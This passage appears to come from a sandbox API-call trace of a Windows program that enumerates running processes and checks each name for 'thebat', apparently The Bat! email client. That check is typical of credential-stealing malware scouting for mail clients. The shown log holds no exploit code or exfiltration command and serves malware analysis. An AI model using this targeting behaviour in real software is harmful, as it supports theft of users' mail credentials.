CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x357bdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0099.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0099.444] StrStrIA (lpFirst="wininit.exe", lpSrch="thebat") returned 0x0 [0099.444] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.445] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357be38 [0099.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357be38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.445] StrStrIA (lpFirst="csrss.exe", lpSrch="thebat") returned 0x0 [0099.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.446] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357be20 [0099.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x357be20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0099.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0099.446] StrStrIA (lpFirst="winlogon.exe", lpSrch="thebat") returned 0x0 [0099.446] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.447] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bf88 [0099.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x357bf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0099.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0099.447] StrStrIA (lpFirst="services.exe", lpSrch="thebat") returned 0x0 [0099.448] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.449] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357bec8 [0099.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x357bec8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0099.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0099.449] StrStrIA (lpFirst="lsass.exe", lpSrch="thebat") returned 0x0 [0099.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.450] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bdf0 [0099.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bdf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.450] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.450] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.451] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357be50 [0099.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357be50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.451] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="thebat") returned 0x0 [0099.451] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.453] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357bf28 [0099.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357bf28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.453] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="thebat") returned 0x0 [0099.453] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.454] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bdd8 [0099.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bdd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.454] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.454] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.454] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.455] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574ea0 [0099.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574ea0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0099.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0099.456] StrStrIA (lpFirst="dwm.exe", lpSrch="thebat") returned 0x0 [0099.456] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.457] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bf70 [0099.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bf70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.457] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.457] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.457] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.458] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bf40 [0099.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bf40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.458] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.458] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.460] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bcb8 [0099.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bcb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.460] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.460] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.460] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.461] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357be68 [0099.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357be68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.461] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.462] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bee0 [0099.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.462] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.463] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.464] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bef8 [0099.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.464] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.464] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.465] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bce8 [0099.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bce8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.465] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.465] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.467] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bd00 [0099.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bd00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.467] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.467] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.468] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bd18 [0099.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bd18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.468] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.468] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.468] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.469] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bd30 [0099.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bd30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.470] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.470] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.471] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bd48 [0099.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x357bd48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0099.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0099.471] StrStrIA (lpFirst="spoolsv.exe", lpSrch="thebat") returned 0x0 [0099.471] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.473] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bd60 [0099.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357bd60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.473] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.473] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.474] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c078 [0099.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x357c078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0099.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0099.475] StrStrIA (lpFirst="audiodg.exe", lpSrch="thebat") returned 0x0 [0099.475] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0099.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.476] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c150 [0099.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x357c150, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0099.476] lstrcpyA (in: lpString1=0x567fabc, 